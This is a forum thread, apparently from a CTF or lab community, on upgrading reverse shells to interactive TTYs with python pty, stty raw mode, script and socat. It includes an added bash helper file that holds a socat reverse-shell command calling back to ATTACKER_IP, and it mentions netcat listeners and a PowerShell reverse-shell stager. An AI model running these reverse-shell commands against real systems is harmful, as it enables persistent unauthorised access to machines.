For the sake of variety, instead of doing the python -c ... thing (which relies on python being available on the box), you could also do:
script /dev/null; this will give you a pty (as tty will tell you), so su and passwd should work. I usually do a bash -i first. Do note that the environment will still need some fixing up (CTRL+Z ... etc., and export TERM=linux, export HOME=/tmp or something similar).
Then fix up the rows and columns. Open another terminal:
stty -a
Get the rows and columns.
Back on your reverse shell:
stty rows <> columns <>
Rarely does the python part not work… When it doesn't, I simply find a workaround or just deal with what I have.
Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won't work with any version of Python 3, so specifying python3 -c ... is necessary. Otherwise a solid description; you nailed it to a "T".
I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash.
I start a reverse shell from another machine.
On my attacking machine I have netcat listening:
nc -l -v -p 80
I get the connection on my host:
listening on [any] 80 …
connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
/bin/sh: can't access tty; job control turned off
/opt/app #
I do my routine to elevate the shell:
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL-Z
stty raw -echo
fg
reset
I have a fully functional shell, BUT I can't close it. I always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought it was a problem with zsh (stty raw -echo; fg kind of), but it is the same in /bin/bash and in xterm instead of Konsole.
Any ideas what could be going wrong here?
On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?
@timebeyond said:
I have a fully functional shell, BUT I can't close it. I always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought it was a problem with zsh (stty raw -echo; fg kind of), but it is the same in /bin/bash and in xterm instead of Konsole.
I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.
On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?
You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.
@splintercode, it appears to have some issues deciding which process listens to the input pipe, though. I run the shell from a small PS stager that IEXs the Invoke-Con* definition along with an invocation in the same command, and often I get at least two powershell.exe's spinning up a process each for every one I try to start.
Turns out it was the combination of three (or possibly four) nested powershell processes (including yours) with DUP'd std handles. Not much you can do about that, really.
Hey, my terminal lags like crazy when I'm upgrading my shell to a fully interactive one with python -c 'import … It happens after I type in stty raw -echo and foreground the nc session. Does anybody have a similar issue?
Personally, I find these methods to always be a bit janky and complicated. I usually immediately go for a socat reverse shell to get a proper tty, or get a normal shell first only to set the socat shell up. It just feels a lot more stable and doesn't have as much unexpected behaviour, in my opinion. Also, it just feels easier ¯\_(ツ)_/¯
Saved me from going nuts; Windows guys struggle with shells, and zsh on the new Kali took me out of my comfort zone post-exploit. Just chain the command:
"stty raw -echo; fg"
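The steps scattered through this thread (the rows/columns fix-up from the first reply, the stty raw -echo; fg chain just above, the socat alternative, and the "terminal is dead after exit" complaint) as a set of bash helpers. This is an added example, not code posted by anyone in the thread: the stty -a sample lines are constructed, fg_raw assumes the file is sourced into the interactive shell that owns the stopped listener job, and TERM=xterm, SHELL=/bin/bash and HOME=/tmp are illustrative defaults.

```bash
#!/usr/bin/env bash
# Added example, not from the thread. Source it into the shell that runs the
# listener (. ./tty_upgrade.sh): fg_raw needs the listener to be a job of
# *this* shell, so the file cannot be run as a separate script.

# Extract one numeric field ("rows" or "columns") from `stty -a` text.
# GNU stty prints "rows 50; columns 180;", BSD stty "50 rows; 180 columns;";
# both layouts are handled. Prints nothing if the field is absent.
_stty_field() {
    printf '%s\n' "$1" | sed -n \
        -e "s/.*$2 \([0-9][0-9]*\);.*/\1/p" \
        -e "s/.*[^0-9]\([0-9][0-9]*\) $2.*/\1/p" | head -n 1
}

# parse_stty_size "<stty -a output>" -> "ROWS COLS" on stdout, status 1 if missing.
# Takes the text as an argument so it can be exercised without a tty; in real
# use: parse_stty_size "$(stty -a)"
parse_stty_size() {
    local rows cols
    rows=$(_stty_field "$1" rows)
    cols=$(_stty_field "$1" columns)
    [ -n "$rows" ] && [ -n "$cols" ] || return 1
    printf '%s %s\n' "$rows" "$cols"
}

# remote_fixup_cmds "<stty -a output>" [TERM] -> the one line to paste into the
# upgraded remote shell: size its pty like the local terminal and set the
# variables a fresh pty lacks. TERM defaults to the local $TERM (or xterm);
# SHELL=/bin/bash and HOME=/tmp are illustrative defaults (assumptions).
remote_fixup_cmds() {
    local term="${2:-${TERM:-xterm}}" size
    size=$(parse_stty_size "$1") || return 1
    set -- $size   # $1=rows $2=cols
    printf 'stty rows %s columns %s; export TERM=%s SHELL=/bin/bash HOME=/tmp\n' \
        "$1" "$2" "$term"
}

# fg_raw: the "stty raw -echo; fg" step, with the terminal restored afterwards.
# Order of operations: catch the shell in the listener, spawn a pty on the box
# (python -c 'import pty;pty.spawn("/bin/bash")' or script /dev/null), press
# Ctrl-Z, then run fg_raw here. Raw mode stops the local tty from swallowing
# ^C, ^Z and tab, so they reach the remote pty instead. stty modes live on the
# tty device, not on nc, so when the remote shell exits the local tty would
# otherwise stay raw with echo off: that is the "dead window" after `exit`.
fg_raw() {
    local saved
    saved=$(stty -g) || return 1   # snapshot current terminal modes
    stty raw -echo
    fg                             # returns when the listener job ends or is stopped again
    stty "$saved"                  # usable prompt again, no blind `reset` needed
}

# Already stuck in a raw terminal? Type this blind and press Enter.
fix_tty() { stty sane; }

# socat variant: socat puts the local tty into raw mode itself and restores it
# when the connection drops. Local: socat_listener 4444
# Remote: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
socat_listener() { socat file:"$(tty)",raw,echo=0 tcp-listen:"$1"; }
```

Typical flow: in terminal A run nc -lvnp 4444, catch the shell, spawn the pty, Ctrl-Z, fg_raw; in terminal B run remote_fixup_cmds "$(stty -a)" and paste the printed line into the remote shell. parse_stty_size is deliberately fed text rather than reading the tty so it can be checked on plain input.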
I've tried the above method a few times, but it failed every time. I don't understand what I am doing wrong…
After doing fg, the Enter key is displayed as ^M.
Something like this:
$ fg
clear^M
Before you start netcat, change the shell to bash by typing bash, then try again. ZSH sucks mate…